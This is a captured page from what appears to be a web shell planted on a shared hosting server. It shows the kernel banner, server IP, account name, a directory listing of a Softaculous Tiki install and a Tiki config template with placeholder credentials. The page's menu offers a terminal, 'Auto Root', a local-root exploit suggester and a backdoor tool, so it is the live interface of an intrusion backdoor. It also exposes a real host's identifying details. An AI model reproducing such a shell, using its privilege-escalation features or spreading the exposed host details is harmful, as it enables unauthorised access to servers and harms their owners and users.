Linux premium71.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.162
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
tiki24 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-06-20 14:17
php53
[ DIR ]
drwxr-xr-x
2025-06-20 14:17
php56
[ DIR ]
drwxr-xr-x
2025-06-20 14:17
php71
[ DIR ]
drwxr-xr-x
2025-06-20 14:17
php81
[ DIR ]
drwxr-xr-x
2025-06-20 14:17
php82
[ DIR ]
drwxr-xr-x
2025-06-20 14:17
clone.php
6.7
KB
-rw-r--r--
2025-06-20 12:36
edit.php
4.46
KB
-rw-r--r--
2025-06-20 12:36
edit.xml
433
B
-rw-r--r--
2024-05-30 09:15
extend.php
10.05
KB
-rw-r--r--
2025-06-20 12:36
fileindex.php
9.53
KB
-rw-r--r--
2025-03-27 11:03
import.php
4.38
KB
-rw-r--r--
2025-06-20 12:36
info.xml
3.09
KB
-rw-r--r--
2025-06-20 09:32
install.js
924
B
-rw-r--r--
2023-10-18 05:30
install.php
5.65
KB
-rw-r--r--
2025-06-20 12:36
install.xml
5.34
KB
-rw-r--r--
2023-10-18 05:30
local.php
833
B
-rw-r--r--
2025-06-20 09:32
md5
1.1
KB
-rw-r--r--
2025-06-20 12:36
notes.txt
1.5
KB
-rw-r--r--
2023-10-18 05:30
tiki24.sql
3.62
MB
-rw-r--r--
2025-06-20 09:32
tiki24.zip
112.2
MB
-rw-r--r--
2025-06-20 09:32
update_pass.php
534
B
-rw-r--r--
2023-10-18 05:30
upgrade.php
10.49
KB
-rw-r--r--
2025-06-20 12:36
upgrade.xml
333
B
-rw-r--r--
2023-10-18 05:30
Save
Rename
<?php $db_tiki='mysqli'; $dbversion_tiki='24.9'; $host_tiki='[[softdbhost]]'; $user_tiki='[[softdbuser]]'; $pass_tiki='[[softdbpass]]'; $dbs_tiki='[[softdb]]'; $client_charset='utf8mb4'; // $dbfail_url = ''; // $noroute_url = './'; // If you experience text encoding issues after updating (e.g. apostrophes etc showing up as strange characters) // $client_charset='latin1'; // $client_charset='utf8mb4'; // See http://tiki.org/ReleaseNotes5.0#Known_Issues and http://doc.tiki.org/Understanding+Encoding for more info // If your php installation does not not have pdo extension // $api_tiki = 'adodb'; // Want configurations managed at the system level or restrict some preferences? http://doc.tiki.org/System+Configuration // $system_configuration_file = '/etc/tiki.ini.php'; // $system_configuration_identifier = 'example.com';